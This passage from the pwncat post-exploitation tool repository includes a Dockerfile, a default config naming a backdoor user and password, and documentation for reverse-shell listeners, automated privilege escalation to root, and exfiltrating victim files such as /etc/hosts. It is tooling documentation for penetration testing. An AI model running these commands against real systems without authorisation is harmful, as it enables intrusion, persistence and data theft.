21 | # Setup pwncat
22 | RUN set -eux \
23 | && cd /opt/pwncat \
24 | && pip install .
25 |
26 | FROM python:3.9-alpine as final
27 |
28 | # Add libstdc++ and create the working directory
29 | RUN set -eux \
30 | && apk add --no-cache libstdc++ \
31 | && mkdir /work
32 |
33 | # Copy installed packages from builder image
34 | COPY --from=builder /usr/local/lib/python3.9 /usr/local/lib/python3.9
35 | COPY --from=builder /usr/local/bin/pwncat-cs /usr/local/bin/pwncat-cs
36 |
37 | # Ensure we have the pwncat plugins downloaded
38 | RUN pwncat-cs --download-plugins
39 |
40 | # Set working directory
41 | WORKDIR /work
42 |
43 | # Entrypoint is pwncat itself
44 | ENTRYPOINT ["pwncat-cs"]
45 |
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 Caleb Stewart
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/data/pwncat.pub:
--------------------------------------------------------------------------------
1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+VJVsigrS5KE58trqdBdMuGVREI7EnHmrZEOExackIFDwolUiOvV33DA2cBVBVzEF6dF8ARd9875P6LtPveJXzXSFu7oxfoHwwnIaOb1Jkal4JkDTVXePIRupZhXT6bfKd3Zewx1ZbQi0pRZnrbe6ardrGFw6YZvrWRZAG9rGfQCI7GjMRz5+mMDA0oKzhBDuemkL/wElJE30Ky3jWWMRT4deK5t1ds940t3/r2pqodHA+n4NA0JxEyPH7c6nXXsCD6KZIYcqwrBSBvlRYQ1rp6BpSqoetqifAF3slUcdam+F1RLmnNu+qL0a1H7cZoM4t5dvWJf1x7AFuGma2YKBMq5nGMG1zfphBAMyMV4LiEmFJp6dZkT9wKG8tpuH8Wc14K68ClZroGQLTUeu6uwhTceKcXHJ7XXy1RRkRiNqz+9YzBEXybstHmQn0NXHlk7Ni3I/XORWcsxwZjJGOrXJ/ipnpEW009KU0VmRP0sOrdMl9iCUZUlatCDcKEDWDuE= pwncat@pwncat
2 |
--------------------------------------------------------------------------------
/data/pwncatrc:
--------------------------------------------------------------------------------
1 | # Set your remote hosts file
2 | set -g lhost "127.0.0.1"
3 | # Set your command prefix
4 | set -g prefix c-k
5 | # Set the default private key to use for privilege escalation
6 | set -g privkey "data/pwncat"
7 | # Set the pwncat backdoor user and password
8 | set -g backdoor_user "pwncat"
9 | set -g backdoor_pass "pwncat"
10 | set -g db "file://db/pwncat"
11 |
12 | set -g on_load {
13 | # Run a command upon a stable connection
14 | # privesc -l
15 | }
16 |
17 | # Examples of command bindings
18 | bind s "sync"
19 | bind c "set state command"
20 |
21 | # Create aliases for commands
22 | alias up upload
23 | alias down download
24 |
25 | # Shortcuts allow single-character prefix which indicate the entire command
26 | # string be passed as the arguments to a specific command. For example:
27 | # "!ls" run "local ls" given the below directives
28 | shortcut ! local
29 | shortcut @ run
30 |
--------------------------------------------------------------------------------
/db/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/calebstewart/pwncat/37f04d4e16ff47c7fd70e95162f9fccd327cca7e/db/.gitkeep
--------------------------------------------------------------------------------
/docs/.gitignore:
--------------------------------------------------------------------------------
1 | build/
2 |
--------------------------------------------------------------------------------
/docs/Makefile:
--------------------------------------------------------------------------------
1 | # Minimal makefile for Sphinx documentation
2 | #
3 |
4 | # You can set these variables from the command line, and also
5 | # from the environment for the first two.
6 | SPHINXOPTS ?=
7 | SPHINXBUILD ?= python $(shell which sphinx-build)
8 | SOURCEDIR = source
9 | BUILDDIR = build
10 |
11 | # Put it first so that "make" without argument is like "make help".
12 | help:
13 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
14 |
15 | .PHONY: help Makefile
16 |
17 | # Catch-all target: route all unknown targets to Sphinx using the new
18 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
19 | %: Makefile
20 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
21 |
--------------------------------------------------------------------------------
/docs/apidoc/module.rst_t:
--------------------------------------------------------------------------------
1 | {%- if show_headings %}
2 | {{- [basename, "module"] | join(' ') | e | heading }}
3 |
4 | {% endif -%}
5 | .. automodule:: {{ qualname }}
6 | {%- for option in automodule_options %}
7 | :{{ option }}:
8 | {%- endfor %}
9 |
10 |
--------------------------------------------------------------------------------
/docs/apidoc/package.rst_t:
--------------------------------------------------------------------------------
1 | {%- macro automodule(modname, options) -%}
2 | .. automodule:: {{ modname }}
3 | {%- for option in options %}
4 | :{{ option }}:
5 | {%- endfor %}
6 | {%- endmacro %}
7 |
8 | {%- macro toctree(docnames) -%}
9 | .. toctree::
10 | :maxdepth: {{ maxdepth }}
11 | {% for docname in docnames %}
12 | {{ docname }}
13 | {%- endfor %}
14 | {%- endmacro %}
15 |
16 | {%- if pkgname == "pwncat" %}
17 | {{- "API Documentation" | e | heading }}
18 | {% else %}
19 | {%- if is_namespace %}
20 | {{- [pkgname, "namespace"] | join(" ") | e | heading }}
21 | {% else %}
22 | {{- [pkgname, "package"] | join(" ") | e | heading }}
23 | {% endif %}
24 | {% endif %}
25 |
26 | {%- if modulefirst and not is_namespace %}
27 | {{ automodule(pkgname, automodule_options) }}
28 | {% endif %}
29 |
30 | {%- if (subpackages+submodules) %}
31 | Modules and Packages
32 | --------------------
33 | {{ toctree(subpackages+submodules) }}
34 | {% endif %}
35 |
--------------------------------------------------------------------------------
/docs/apidoc/package.rst_t.bak:
--------------------------------------------------------------------------------
1 | {%- macro automodule(modname, options) -%}
2 | .. automodule:: {{ modname }}
3 | {%- for option in options %}
4 | :{{ option }}:
5 | {%- endfor %}
6 | {%- endmacro %}
7 |
8 | {%- macro toctree(docnames) -%}
9 | .. toctree::
10 | :maxdepth: {{ maxdepth }}
11 | {% for docname in docnames %}
12 | {{ docname }}
13 | {%- endfor %}
14 | {%- endmacro %}
15 |
16 | {%- if pkgname == "pwncat" %}
17 | {{- "API Documentation" | e | heading }}
18 | {% else %}
19 | {%- if is_namespace %}
20 | {{- [pkgname, "namespace"] | join(" ") | e | heading }}
21 | {% else %}
22 | {{- [pkgname, "package"] | join(" ") | e | heading }}
23 | {% endif %}
24 | {% endif %}
25 |
26 | {%- if modulefirst and not is_namespace %}
27 | {{ automodule(pkgname, automodule_options) }}
28 | {% endif %}
29 |
30 | {%- if subpackages %}
31 | Subpackages
32 | -----------
33 |
34 | {{ toctree(subpackages) }}
35 | {% endif %}
36 |
37 | {%- if submodules %}
38 | Submodules
39 | ----------
40 | {% if separatemodules %}
41 | {{ toctree(submodules) }}
42 | {% else %}
43 | {%- for submodule in submodules %}
44 | {% if show_headings %}
45 | {{- [submodule, "module"] | join(" ") | e | heading(2) }}
46 | {% endif %}
47 | {{ automodule(submodule, automodule_options) }}
48 | {% endfor %}
49 | {%- endif %}
50 | {%- endif %}
51 |
52 | {%- if not modulefirst and not is_namespace %}
53 | Module contents
54 | ---------------
55 |
56 | {{ automodule(pkgname, automodule_options) }}
57 | {% endif %}
58 |
--------------------------------------------------------------------------------
/docs/apidoc/toc.rst_t:
--------------------------------------------------------------------------------
1 | {{ header | heading }}
2 |
3 | .. toctree::
4 | :maxdepth: {{ maxdepth }}
5 | :hidden:
6 | {% for docname in docnames %}
7 | {{ docname }}
8 | {%- endfor %}
9 |
--------------------------------------------------------------------------------
/docs/make.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | pushd %~dp0
4 |
5 | REM Command file for Sphinx documentation
6 |
7 | if "%SPHINXBUILD%" == "" (
8 | set SPHINXBUILD=sphinx-build
9 | )
10 | set SOURCEDIR=source
11 | set BUILDDIR=build
12 |
13 | if "%1" == "" goto help
14 |
15 | %SPHINXBUILD% >NUL 2>NUL
16 | if errorlevel 9009 (
17 | echo.
18 | echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
19 | echo.installed, then set the SPHINXBUILD environment variable to point
20 | echo.to the full path of the 'sphinx-build' executable. Alternatively you
21 | echo.may add the Sphinx directory to PATH.
22 | echo.
23 | echo.If you don't have Sphinx installed, grab it from
24 | echo.http://sphinx-doc.org/
25 | exit /b 1
26 | )
27 |
28 | %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
29 | goto end
30 |
31 | :help
32 | %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
33 |
34 | :end
35 | popd
36 |
--------------------------------------------------------------------------------
/docs/rebuild_api_docs.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | rm -rf source/api/*
4 |
5 | sphinx-apidoc -M -T -e -t ./apidoc -d -1 -f -o ./source/api ../pwncat ../pwncat/commands/[!_]* ../pwncat/channel/[!_]* ../pwncat/modules/*[!.][!p][!y]
6 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.channel.rst:
--------------------------------------------------------------------------------
1 | pwncat.channel package
2 | ======================
3 |
4 |
5 | .. automodule:: pwncat.channel
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.commands.rst:
--------------------------------------------------------------------------------
1 | pwncat.commands package
2 | =======================
3 |
4 |
5 | .. automodule:: pwncat.commands
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.config.rst:
--------------------------------------------------------------------------------
1 | pwncat.config module
2 | ====================
3 |
4 | .. automodule:: pwncat.config
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.db.rst:
--------------------------------------------------------------------------------
1 | pwncat.db module
2 | ================
3 |
4 | .. automodule:: pwncat.db
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.ability.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.ability module
2 | ===========================
3 |
4 | .. automodule:: pwncat.facts.ability
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.implant.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.implant module
2 | ===========================
3 |
4 | .. automodule:: pwncat.facts.implant
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.linux.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.linux module
2 | =========================
3 |
4 | .. automodule:: pwncat.facts.linux
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts package
2 | ====================
3 |
4 |
5 | .. automodule:: pwncat.facts
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
10 | Modules and Packages
11 | --------------------
12 | .. toctree::
13 | :maxdepth: -1
14 |
15 | pwncat.facts.ability
16 | pwncat.facts.implant
17 | pwncat.facts.linux
18 | pwncat.facts.tamper
19 | pwncat.facts.windows
20 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.tamper.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.tamper module
2 | ==========================
3 |
4 | .. automodule:: pwncat.facts.tamper
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.facts.windows.rst:
--------------------------------------------------------------------------------
1 | pwncat.facts.windows module
2 | ===========================
3 |
4 | .. automodule:: pwncat.facts.windows
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.gtfobins.rst:
--------------------------------------------------------------------------------
1 | pwncat.gtfobins module
2 | ======================
3 |
4 | .. automodule:: pwncat.gtfobins
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.manager.rst:
--------------------------------------------------------------------------------
1 | pwncat.manager module
2 | =====================
3 |
4 | .. automodule:: pwncat.manager
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.modules.enumerate.rst:
--------------------------------------------------------------------------------
1 | pwncat.modules.enumerate module
2 | ===============================
3 |
4 | .. automodule:: pwncat.modules.enumerate
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.modules.implant.rst:
--------------------------------------------------------------------------------
1 | pwncat.modules.implant module
2 | =============================
3 |
4 | .. automodule:: pwncat.modules.implant
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.modules.rst:
--------------------------------------------------------------------------------
1 | pwncat.modules package
2 | ======================
3 |
4 |
5 | .. automodule:: pwncat.modules
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
10 | Modules and Packages
11 | --------------------
12 | .. toctree::
13 | :maxdepth: -1
14 |
15 | pwncat.modules.enumerate
16 | pwncat.modules.implant
17 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.platform.linux.rst:
--------------------------------------------------------------------------------
1 | pwncat.platform.linux module
2 | ============================
3 |
4 | .. automodule:: pwncat.platform.linux
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.platform.rst:
--------------------------------------------------------------------------------
1 | pwncat.platform package
2 | =======================
3 |
4 |
5 | .. automodule:: pwncat.platform
6 | :members:
7 | :undoc-members:
8 | :show-inheritance:
9 |
10 | Modules and Packages
11 | --------------------
12 | .. toctree::
13 | :maxdepth: -1
14 |
15 | pwncat.platform.linux
16 | pwncat.platform.windows
17 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.platform.windows.rst:
--------------------------------------------------------------------------------
1 | pwncat.platform.windows module
2 | ==============================
3 |
4 | .. automodule:: pwncat.platform.windows
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.rst:
--------------------------------------------------------------------------------
1 | API Documentation
2 | =================
3 |
4 | .. automodule:: pwncat
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
9 | Modules and Packages
10 | --------------------
11 | .. toctree::
12 | :maxdepth: -1
13 |
14 | pwncat.channel
15 | pwncat.commands
16 | pwncat.facts
17 | pwncat.modules
18 | pwncat.platform
19 | pwncat.config
20 | pwncat.db
21 | pwncat.gtfobins
22 | pwncat.manager
23 | pwncat.subprocess
24 | pwncat.target
25 | pwncat.util
26 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.subprocess.rst:
--------------------------------------------------------------------------------
1 | pwncat.subprocess module
2 | ========================
3 |
4 | .. automodule:: pwncat.subprocess
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.target.rst:
--------------------------------------------------------------------------------
1 | pwncat.target module
2 | ====================
3 |
4 | .. automodule:: pwncat.target
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/api/pwncat.util.rst:
--------------------------------------------------------------------------------
1 | pwncat.util module
2 | ==================
3 |
4 | .. automodule:: pwncat.util
5 | :members:
6 | :undoc-members:
7 | :show-inheritance:
8 |
--------------------------------------------------------------------------------
/docs/source/commands/alias.rst:
--------------------------------------------------------------------------------
1 | Alias
2 | =====
3 |
4 | ``alias`` is a simple command. It provides the ability to rename any built-in command. Unlike aliases in common shells,
5 | this does not allow you to provide default parameters to commands. Instead, it simply creates an alternative name.
6 |
7 | You can specify a new alias simply by providing the new name followed by the new name. For example, to alias "download"
8 | to "down", you could do this in your configuration script:
9 |
10 | .. code-block:: bash
11 |
12 | alias down "download"
13 |
14 | ``alias`` takes as it's second argument a string. Passing anything else (e.g. a code block) will not produce the desired
15 | results. The command you are aliasing must exist and be a standard command (no aliases to other aliases are supported).
--------------------------------------------------------------------------------
/docs/source/commands/back.rst:
--------------------------------------------------------------------------------
1 | Back
2 | ====
3 |
4 | The back command is used to exit the local pwncat prompt and return to your remote shell. It is not expected to be
5 | used very often since the ``C-d`` shortcut is the primary method of switching. However, if you need to switch modes from
6 | a script, you can do so with this command. It takes no parameters and will immediately exit the pwncat shell to
7 | return to the remote prompt.
--------------------------------------------------------------------------------
/docs/source/commands/bind.rst:
--------------------------------------------------------------------------------
1 | Bind
2 | ====
3 |
4 | The bind command is used to create new keyboard shortcuts or change old ones. Keyboard shortcuts are accessed by first
5 | pressing your defined "prefix" key (by default: ``C-k``). ``bind`` takes two parameters: the key to bind, and the
6 | script to run when it is pressed.
7 |
8 | Key Selection
9 | -------------
10 |
11 | The key argument is specified as a string. If the string is a single character, it is assumed to be that literal printed
12 | character. For example, to bind the lowercase "a" key to a command you could:
13 |
14 | .. code-block:: bash
15 |
16 | bind "a" "some helpful command"
17 |
18 | If the key argument is longer than one character, it is assumed to be a key name. The key names accepted by pwncat
19 | are taken directly at runtime from the list of known ANSI keystrokes defined in the ``prompt_toolkit`` package. They
20 | use the same syntax as in prompt toolkit. All key names are lowercase. The prompt_toolkit documentation covers the
21 | keys supported by their module in their `documentation here`_. Any key defined by prompt_toolkit is available for
22 | key binding by pwncat.
23 |
24 | Script Content
25 | --------------
26 |
27 | The target of a key binding is a script. Scripts in pwncat can be specified as a string, which can only contain a
28 | single command, or as a code block surrounded by curly braces. When in code block mode, you can use as many commands
29 | as you like, and even insert comments, blank lines, etc.
30 |
31 | .. code-block:: bash
32 |
33 | bind "a" {
34 | # you can bind a series of commands which you
35 | # do very often to a key, if you find it helpful.
36 | privesc -l
37 | persist -s
38 | tamper
39 | }
40 |
41 | .. _`documentation here`: https://python-prompt-toolkit.readthedocs.io/en/master/pages/advanced_topics/key_bindings.html#list-of-special-keys
--------------------------------------------------------------------------------
/docs/source/commands/download.rst:
--------------------------------------------------------------------------------
1 | Download
2 | ========
3 |
4 | The ``download`` command provides an easy way to exfiltrate files from the victim. All file transfers are made over
5 | the same connection as your shell, and there are no HTTP or raw socket ports needed to make these transfers.
6 | File transfers are accomplished by utilizing the ``gtfobins`` framework to locate file readers on the victim host and
7 | write the contents back over the pipe. In some cases, this includes and requires encoding the data on the victim end
8 | and automatically decoding on the attacking host.
9 |
10 | The ``download`` command has a simply syntax which specifies the source and destination files only. The source file is
11 | a file on the remote host, which will be tab-completed at the pwncat prompt. The destination is a local file path
12 | on your local host which will be created (or overwritten if existing) with the content of the remote file.
13 |
14 | .. code-block:: bash
15 | :caption: Downloading the contents of /etc/hosts to a local file
16 |
17 | download /etc/hosts ./victim-hosts
18 |
19 |
--------------------------------------------------------------------------------
/docs/source/commands/escalate.rst:
--------------------------------------------------------------------------------
1 | Escalate
2 | ========
3 |
4 | The escalate command is used to perform automated escalation. As described in the privilege escalation
5 | section, this command is capable of perform recursive escalation across multiple users and sessions. It
6 | will also utilize any installed local implants as needed to escalate to the requested user.
7 |
8 | .. code-block:: bash
9 |
10 | # List direct escalations from the current user to any user
11 | escalate list
12 | # List direct escalations from the current user to root
13 | escalate list -u root
14 | # Attempt escalation by any means to root
15 | escalate run
16 | # Attempt escalation by any means to john
17 | escalate run -u john
18 |
--------------------------------------------------------------------------------
/docs/source/commands/index.rst:
--------------------------------------------------------------------------------
1 | Command index
2 | =============
3 |
4 | .. toctree::
5 | :caption: Contents
6 |
7 | alias.rst
8 | back.rst
9 | bind.rst
10 | connect.rst
11 | download.rst
12 | escalate.rst
13 | lcd.rst
14 | load.rst
15 | listen.rst
16 | listeners.rst
17 | lpwd.rst
18 | run.rst
19 | info.rst
20 | search.rst
21 | use.rst
22 | upload.rst
23 |
--------------------------------------------------------------------------------
/docs/source/commands/info.rst:
--------------------------------------------------------------------------------
1 | Info
2 | ====
3 |
4 | This command gets the documentation/help information for the specified
5 | module. This command has no other arguments or parameters. When called
6 | without a module name and within a module context, the documentation
7 | for the current module is displayed.
8 |
9 | .. code-block:: bash
10 |
11 | info enumerate.gather
12 |
--------------------------------------------------------------------------------
/docs/source/commands/lcd.rst:
--------------------------------------------------------------------------------
1 | lcd
2 | ===
3 |
4 | The ``lcwd`` command allows you to change the *local* working directory of the running
5 | pwncat instance. This effects any command which interacts with the local filesystem (
6 | e.g. ``upload`` and ``download``).
7 |
8 | .. code-block:: bash
9 |
10 | # Example from @DanaEpp :P
11 | lcd ~/engagements/client_some_gawd_aweful_guid/host_abc/loot
12 | # Now, the following downloads will end up in the above directory
13 | download /path/to/some/loot
14 | download /paht/to/some/other/loot
15 |
--------------------------------------------------------------------------------
/docs/source/commands/listen.rst:
--------------------------------------------------------------------------------
1 | Listen
2 | ======
3 |
4 | Create a new background listener to asynchronously establish sessions via a reverse shell payload. Background listeners can operate in two different modes: with a platform and without. If a platform type is not specified when creating a listener, channels will be queued within the listener until you initialize them with the ``listeners`` command.
5 |
6 | Using the ``--drop-duplicate`` option will cause pwncat to drop any new sessions which duplicate both the target host and user of an existing session. This could be useful when using an infinite reverse shell implant.
7 |
8 | Currently, listeners can only be used with the ``socket`` protocol, however listeners are capable of wrapping the socket server in an SSL context. A background listener can effectively replace the ``bind://`` and ``ssl-bind://`` protocols.
9 |
10 | The ``--count`` option can be used to restrict background listeners to a set number of active sessions. After reaching the number specified by ``--count``, the listener will automatically be stopped.
11 |
12 | .. code-block:: bash
13 |
14 | # Create a basic listener for linux sessions on port 9999
15 | listen -m linux 9999
16 | # Create an SSL listener for linux sessions on port 6666
17 | listen -m linux --ssl 9999
18 | # Create a listener with no platform which caches channels until initialization
19 | listen 8888
20 | # Create a listener which automatically exits after 4 established sessions
21 | listen --count 4 --platform windows 5555
22 |
--------------------------------------------------------------------------------
/docs/source/commands/listeners.rst:
--------------------------------------------------------------------------------
1 | Listeners
2 | =========
3 |
4 | The ``listeners`` command is used to manager active and stopped listeners. This command provides the capability to view listener configuration, stop active listeners, view failure messages, and initialize queued channels.
5 |
6 | When initializing a channel, you will be shown a list of pending channels, of which you can select and define a platform name. After specifying a platform, a session will be established with the channel and you will have the option of initializing other queue channels.
7 |
8 | .. code-block:: bash
9 | :caption: Interacting with Listeners
10 |
11 | # List only running and failed listeners
12 | listeners
13 | # List all listeners (running, stopped, and failed)
14 | listeners --all
15 | # Kill listener with ID 0
16 | listeners -k 0
17 | # View listener configuration (and failure message)
18 | listeners 0
19 | # Initialize pending channels
20 | listeners --init 0
21 |
--------------------------------------------------------------------------------
/docs/source/commands/load.rst:
--------------------------------------------------------------------------------
1 | Load
2 | ====
3 |
4 | This command allows you to load custom pwncat modules from a python package.
5 | The only parameter is the local path to a directory containing python packages
6 | to load as modules.
7 |
8 | pwncat will load all modules under that package and search for classes named
9 | ``Module`` implementing the ``BaseModule`` base class. These modules will be named
10 | based on the python package name relative to the specified directory. For example,
11 | if you had a directory called ``.pwncat-modules`` with this structure::
12 |
13 | - .pwncat-modules/
14 | - enumerate/
15 | - __init__.py
16 | - custom.py
17 | - __init__.py
18 |
19 | And a class named ``Module`` defined in ```custom.py`` then a new pwncat module
20 | would be available under the name ``enumerate.custom``.
21 |
22 | This command can be used in your configuration script to automatically load custom
23 | modules at runtime.
24 |
25 | .. code-block:: bash
26 |
27 | # Load modules from /home/user/.pwncat-modules
28 | (local) pwncat$ load /home/user/.pwncat-modules
29 | (local) pwncat$ run enumerate.custom
30 |
--------------------------------------------------------------------------------
/docs/source/commands/lpwd.rst:
--------------------------------------------------------------------------------
1 | lpwd
2 | ====
3 |
4 | The ``lpwd`` directory will print the current *local* working directory. This is the directory
5 | which commands like ``upload`` and ``download`` will interpret as ``.``.
6 |
7 | .. code-block:: bash
8 |
9 | # Print the local working directory
10 | lpwd
11 |
--------------------------------------------------------------------------------
/docs/source/commands/run.rst:
--------------------------------------------------------------------------------
1 | Run
2 | ===
3 |
4 | The ``run`` command gives you access to all pwncat modules at runtime. Most functionality in
5 | pwncat is implemented using modules. This includes privilege escalation, enumeration and
6 | persistence. You can locate modules using the ``search`` command or tab-complete their name
7 | with the ``run`` command.
8 |
9 | The ``run`` command is similar to the command with the same name in frameworks like Metasploit.
10 | The first argument to ``run`` is the name of the module you would like to execute. This takes
11 | the form of a Python fully-qualified package name. The default modules are within the ``pwncat/modules``
12 | directory, but other can be loaded with the ``load`` command.
13 |
14 | Modules may take arguments, which can be appended as key-value pairs to the end of a call to
15 | the ``run`` command:
16 |
17 | .. code-block:: bash
18 |
19 | # Enumerate setuid files on the remote host
20 | run enumerate.gather types=file.suid
21 |
22 |
23 | Required module arguments are first taken from these key-value pairs. If they aren't present,
24 | they are taken from the global configuration.
25 |
26 |
27 | Run Within A Context
28 | --------------------
29 |
30 | In pwncat, the ``use`` command can enter a module context. Within a module context, the
31 | pwncat prompt will change from "(pwncat) local$" to "(module_name) local$". In this state,
32 | you can set module arguments with the ``set`` command. After the arguments are set, you can
33 | run the module with ``run``. Within a module context, no arguments are required for ``run``,
34 | however you are allowed to specify other key-value items as well. For example:
35 |
36 | .. code-block:: bash
37 |
38 | # Perform the same enumeration as seen above
39 | use enumerate.gather
40 | set types file.suid
41 | run
42 |
--------------------------------------------------------------------------------
/docs/source/commands/search.rst:
--------------------------------------------------------------------------------
1 | Search
2 | ======
3 |
4 | This command allows you to search for relevant modules which are currently imported
5 | into pwncat. This performs a glob-based search and provides an ellipsized
6 | description and module name in a nice table. The syntax is simple:
7 |
8 | .. code-block:: bash
9 |
10 | # Search for modules under the `enumerate` package
11 | (local) pwncat$ search enumerate.*
12 |
--------------------------------------------------------------------------------
/docs/source/commands/upload.rst:
--------------------------------------------------------------------------------
1 | Upload
2 | ======
3 |
4 | pwncat makes file upload easy through the ``upload`` command. File upload is accomplished via
5 | the ``gtfobins`` modules, which will enumerate available local binaries capable of writing printable
6 | or binary data to files on the remote host. Often, this is ``dd`` if available but could be any
7 | of the many binaries which ``gtfobins`` understands. The upload takes place over the same
8 | connection as your shell, which means you don't need another HTTP or socket server or extra connectivity
9 | to your target host.
10 |
11 | At the local pwncat prompt, local and remote files are tab-completed to provided an easier upload
12 | interface, and a progress bar is displayed.
13 |
14 | .. code-block:: bash
15 | :caption: Upload a script to the remote host
16 |
17 | upload ./malicious.sh /tmp/definitely-not-malicious
18 |
--------------------------------------------------------------------------------
/docs/source/commands/use.rst:
--------------------------------------------------------------------------------
1 | Use
2 | ===
3 |
4 | The ``use`` command can be *used* to enter the context of a module. When
5 | within a module context, the ``run``, ``set`` and ``info`` commands operate
6 | off of the module currently in the context.
7 |
8 | The use command simply takes the name of the module you would like to use
9 | and takes no other arguments or flags.
10 |
11 | .. code-block:: bash
12 |
13 | # Enter the context of the `enumerate.gather` module
14 | use enumerate.gather
15 | # Get information/help for this module
16 | info
17 | # Run the module
18 | run
19 |
--------------------------------------------------------------------------------
/docs/source/enum.rst:
--------------------------------------------------------------------------------
1 | Enumeration
2 | ===========
3 |
4 | Enumeration in pwncat is achieved through the ``enumerate.*`` modules. All these modules
5 | implement a sub-class of the standard pwncat module. Each enumeration can be run
6 | individually or you can use one of the automated enumeration groups. Enumeration modules can
7 | specify the their "schedule" which affects when they are run. By default, enumeration modules
8 | run only once and their results are cached in the database. Some modules specify a "per-user"
9 | schedule which means they run once per user. A smaller number of modules specify a "always"
10 | schedule which means that every time you run the module it will execute that enumeration
11 | regardless of any cached entries.
12 |
13 |
14 | Gathering Enumeration Data
15 | --------------------------
16 |
17 | The base ``enumerate`` module is an alias of ``enumerate.gather``. This module is used to
18 | gather enumeration facts from all other enumeration modules. Facts can be filtered by the
19 | module name or the types of facts.
20 |
21 | .. code-block:: bash
22 |
23 | # Enumerate only SUID and File Capability enumeration types
24 | (local) pwncat$ run enumerate types=file.suid,file.caps
25 | # Enumerate facts from all available modules
26 | (local) pwncat$ run enumerate
27 |
28 | Generating A Target Report
29 | --------------------------
30 |
31 | The ``report`` module utilizes the enumeration framework to generate formatted host reports.
32 | When run without any arguments, this module will gather interesting host details and render
33 | a report to the terminal. Optionally, you can specify an output file name which where a
34 | Markdown report will be written.
35 |
36 | The default report templates can be found in ``pwncat/data/reports``.
37 |
38 | .. code-block:: bash
39 |
40 | # Generate formatted report
41 | (local) pwncat$ run report
42 | # Generate a markdown report
43 | (local) pwncat$ run report output=report.md
44 |
--------------------------------------------------------------------------------
/docs/source/modules.rst:
--------------------------------------------------------------------------------
1 | Modules
2 | =======
3 |
4 | pwncat has two programmable building blocks: commands and modules. Modules are
5 | specific to an open session. They are intended to retrieve some information or
6 | make a modification to a specific target. By default, modules are loaded from
